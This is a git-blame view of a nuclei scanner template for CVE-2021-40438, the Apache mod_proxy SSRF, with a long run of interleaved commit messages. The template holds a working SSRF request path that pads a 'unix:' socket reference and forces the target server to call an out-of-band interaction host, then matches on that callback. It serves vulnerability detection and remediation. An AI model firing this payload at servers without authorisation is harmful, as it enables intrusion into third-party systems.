daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2021/CVE-2021-40438.yaml

47 lines
1.6 KiB
YAML
Raw Normal View History

Added CVE-2021-40438
2021-10-14 19:59:52 +00:00
id: CVE-2021-40438
info:
Update CVE-2021-40438.yaml
2022-11-29 05:49:16 +00:00
name: Apache <= 2.4.48 - Mod_Proxy SSRF
Added CVE-2021-40438
2021-10-14 19:59:52 +00:00
author: pdteam
severity: critical
Dashboard Content Enhancements (#4238) Dashboard Content Enhancements
2022-04-25 14:35:07 +00:00
description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.
Updated 2021 CVEs
2023-09-06 12:09:01 +00:00
remediation: Upgrade to Apache version 2.4.49 or later.
Added CVE-2021-40438
2021-10-14 19:59:52 +00:00
reference:
- https://firzen.de/building-a-poc-for-cve-2021-40438
- https://httpd.apache.org/security/vulnerabilities_24.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-40438
Added CPE and EPSS Score to CVE Templates
2023-04-12 10:55:48 +00:00
- https://cert-portal.siemens.com/productcert/pdf/ssa-685781.pdf
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
- https://lists.apache.org/thread.html/r210807d0bb55f4aa6fbe1512be6bcc4dacd64e84940429fba329967a@%3Cusers.httpd.apache.org%3E
Auto Generated CVE annotations [Thu Oct 14 20:34:25 UTC 2021] :robot:
2021-10-14 20:34:25 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com>
2022-05-17 09:18:12 +00:00
cvss-score: 9
Auto Generated CVE annotations [Thu Oct 14 20:34:25 UTC 2021] :robot:
2021-10-14 20:34:25 +00:00
cve-id: CVE-2021-40438
cwe-id: CWE-918
TemplateMan Update [Thu Nov 9 06:04:51 UTC 2023] :robot:
2023-11-09 06:04:52 +00:00
epss-score: 0.972
TemplateMan Update [Tue Nov 14 05:56:48 UTC 2023] :robot:
2023-11-14 05:56:48 +00:00
epss-percentile: 0.99778
Updated 2021 CVEs
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
Added max request counter of each template
2023-04-28 08:11:21 +00:00
metadata:
max-request: 1
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
vendor: apache
product: http_server
tags: cve,cve2021,ssrf,apache,mod-proxy,kev
Added CVE-2021-40438
2021-10-14 19:59:52 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-04-27 04:28:59 +00:00
http:
Added CVE-2021-40438
2021-10-14 19:59:52 +00:00
- method: GET
path:
replaced with placeholder
2023-03-09 13:39:16 +00:00
- '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://{{interactsh-url}}'
Added CVE-2021-40438
2021-10-14 19:59:52 +00:00
Using "host-redirects" instead of "redirects" to avoid scanning 3rd party / out of scope hosts. (#5491)
2022-10-07 21:27:25 +00:00
host-redirects: true
Added CVE-2021-40438
2021-10-14 19:59:52 +00:00
max-redirects: 2
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
CVE-2021-40438 false negative fix
2023-03-09 13:19:32 +00:00
matchers-condition: and
Added CVE-2021-40438
2021-10-14 19:59:52 +00:00
matchers:
- type: word
words:
Dashboard Template Enhancements (#3752) * Enhancement: cves/2021/CVE-2021-1497.yaml by cs * Enhancement: cves/2010/CVE-2010-1957.yaml by mp * Enhancement: cves/2010/CVE-2010-1977.yaml by mp * Enhancement: cves/2010/CVE-2010-1979.yaml by mp * Enhancement: cves/2010/CVE-2010-1980.yaml by mp * Enhancement: cves/2010/CVE-2010-1981.yaml by mp * Enhancement: cves/2010/CVE-2010-1982.yaml by mp * Enhancement: cves/2010/CVE-2010-1983.yaml by mp * Enhancement: cves/2010/CVE-2010-2033.yaml by mp * Enhancement: cves/2010/CVE-2010-2034.yaml by mp * Enhancement: cves/2010/CVE-2010-2035.yaml by mp * Enhancement: cves/2010/CVE-2010-2036.yaml by mp * Enhancement: cves/2010/CVE-2010-2037.yaml by mp * Enhancement: cves/2010/CVE-2010-2045.yaml by mp * Enhancement: cves/2010/CVE-2010-2050.yaml by mp * Enhancement: cves/2010/CVE-2010-2122.yaml by mp * Enhancement: cves/2010/CVE-2010-1980.yaml by mp * Enhancement: cves/2010/CVE-2010-1981.yaml by mp * Enhancement: cves/2010/CVE-2010-1982.yaml by mp * Enhancement: cves/2010/CVE-2010-2035.yaml by mp * Enhancement: cves/2010/CVE-2010-2128.yaml by mp * Enhancement: cves/2010/CVE-2010-2259.yaml by mp * Enhancement: cves/2010/CVE-2010-2307.yaml by mp * Enhancement: cves/2010/CVE-2010-2507.yaml by mp * Enhancement: cves/2010/CVE-2010-2680.yaml by mp * Enhancement: cves/2010/CVE-2010-2682.yaml by mp * Enhancement: cves/2010/CVE-2010-2857.yaml by mp * Enhancement: cves/2010/CVE-2010-2861.yaml by mp * Enhancement: cves/2010/CVE-2010-2918.yaml by mp * Enhancement: cves/2010/CVE-2010-2920.yaml by mp * Enhancement: cves/2010/CVE-2010-3203.yaml by mp * Enhancement: cves/2010/CVE-2010-3426.yaml by mp * Enhancement: cves/2010/CVE-2010-4617.yaml by mp * Enhancement: cves/2010/CVE-2010-4231.yaml by mp * Enhancement: cves/2010/CVE-2010-4282.yaml by mp * Enhancement: cves/2010/CVE-2010-4282.yaml by mp * Enhancement: cves/2010/CVE-2010-4617.yaml by mp * Enhancement: cves/2010/CVE-2010-4719.yaml by mp * Enhancement: cves/2010/CVE-2010-4769.yaml by mp * Enhancement: cves/2010/CVE-2010-4977.yaml by mp * Enhancement: cves/2010/CVE-2010-5028.yaml by mp * Enhancement: cves/2010/CVE-2010-5278.yaml by mp * Enhancement: cves/2010/CVE-2010-5286.yaml by mp * Enhancement: cves/2011/CVE-2011-0049.yaml by mp * Enhancement: cves/2011/CVE-2011-1669.yaml by mp * Enhancement: cves/2011/CVE-2011-2744.yaml by mp * Enhancement: cves/2000/CVE-2000-0114.yaml by mp * Enhancement: cves/2011/CVE-2011-3315.yaml by mp * Enhancement: cves/2011/CVE-2011-4336.yaml by mp * Enhancement: cves/2011/CVE-2011-4618.yaml by mp * Enhancement: cves/2011/CVE-2011-4624.yaml by mp * Enhancement: cves/2011/CVE-2011-4804.yaml by mp * Enhancement: cves/2011/CVE-2011-0049.yaml by mp * Enhancement: cves/2011/CVE-2011-2780.yaml by mp * Enhancement: cves/2011/CVE-2011-2780.yaml by mp * Enhancement: cves/2012/CVE-2012-1823.yaml by mp * Enhancement: cves/2012/CVE-2012-0392.yaml by mp * Enhancement: cves/2012/CVE-2012-1226.yaml by mp * Enhancement: cves/2012/CVE-2012-0996.yaml by mp * Enhancement: cves/2021/CVE-2021-39226.yaml by cs * Enhancement: cves/2021/CVE-2021-27358.yaml by cs * Enhancement: cves/2021/CVE-2021-43798.yaml by cs * Enhancement: cves/2021/CVE-2021-43798.yaml by cs * Enhancement: cves/2021/CVE-2021-43798.yaml by cs * Enhancement: cves/2012/CVE-2012-1835.yaml by mp * Enhancement: cves/2012/CVE-2012-0901.yaml by mp * Enhancement: cves/2011/CVE-2011-5265.yaml by mp * Enhancement: cves/2011/CVE-2011-5181.yaml by mp * Enhancement: cves/2011/CVE-2011-5179.yaml by mp * Enhancement: cves/2011/CVE-2011-5107.yaml by mp * Enhancement: cves/2011/CVE-2011-5106.yaml by mp * Enhancement: cves/2011/CVE-2011-4926.yaml by mp * Enhancement: cves/2012/CVE-2012-0991.yaml by mp * Enhancement: cves/2012/CVE-2012-0981.yaml by mp * Enhancement: cves/2012/CVE-2012-0896.yaml by mp * Enhancement: cves/2012/CVE-2012-0392.yaml by mp * Enhancement: cves/2012/CVE-2012-0392.yaml by mp Fix "too few spaces before comment" lint errors * Enhancement: cves/2011/CVE-2011-5106.yaml by mp * Enhancement: cves/2011/CVE-2011-4926.yaml by mp * Enhancement: cves/2013/CVE-2013-2287.yaml by mp * Enhancement: cves/2012/CVE-2012-5913.yaml by mp * Enhancement: cves/2012/CVE-2012-4889.yaml by mp * Enhancement: cves/2012/CVE-2012-4768.yaml by mp * Enhancement: cves/2012/CVE-2012-4547.yaml by mp * Enhancement: cves/2012/CVE-2012-4273.yaml by mp * Enhancement: cves/2012/CVE-2012-4242.yaml by mp * Enhancement: cves/2012/CVE-2012-2371.yaml by mp * Enhancement: cves/2013/CVE-2013-2248.yaml by mp * Enhancement: cves/2012/CVE-2012-4940.yaml by mp * Enhancement: cves/2012/CVE-2012-4878.yaml by mp * Enhancement: cves/2012/CVE-2012-4253.yaml by mp * Enhancement: cves/2012/CVE-2012-4253.yaml by mp Trailing space * Enhancement: cves/2013/CVE-2013-2251.yaml by mp * Enhancement: cves/2013/CVE-2013-1965.yaml by mp * Enhancement: cves/2012/CVE-2012-3153.yaml by mp * Enhancement: cves/2012/CVE-2012-5913.yaml by mp * Enhancement: cves/2012/CVE-2012-4242.yaml by mp * Merge conflict * Fix references syntax * Fix syntax. Again. * Update CVE-2011-4926.yaml * Enhancement: cves/2021/CVE-2021-28073.yaml by cs * Enhancement: cves/2021/CVE-2021-39226.yaml by cs * Enhancement: cves/2021/CVE-2021-20167.yaml by cs * Enhancement: cves/2021/CVE-2021-40438.yaml by cs * Enhancement: cves/2021/CVE-2021-40438.yaml by cs Co-authored-by: sullo <sullo@cirt.net>
2022-02-23 08:00:19 +00:00
- "Interactsh Server"
CVE-2021-40438 false negative fix
2023-03-09 13:19:32 +00:00
- type: word
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
part: interactsh_protocol # Confirms the HTTP Interaction
CVE-2021-40438 false negative fix
2023-03-09 13:19:32 +00:00
words:
- "http"
Auto Template Signing [Tue Nov 14 10:20:38 UTC 2023] :robot:
2023-11-14 10:20:39 +00:00
# digest: 4b0a00483046022100851a9f972a6a2c5a3dfe8d2b90b0f08be78414536595de1199ad3f172f85da84022100c3f3532c87ceba25e399e4d30891a605f30ce2d8ae07fe5b7135ee66f97536ea:922c64590222798bb761d5b6d8e72950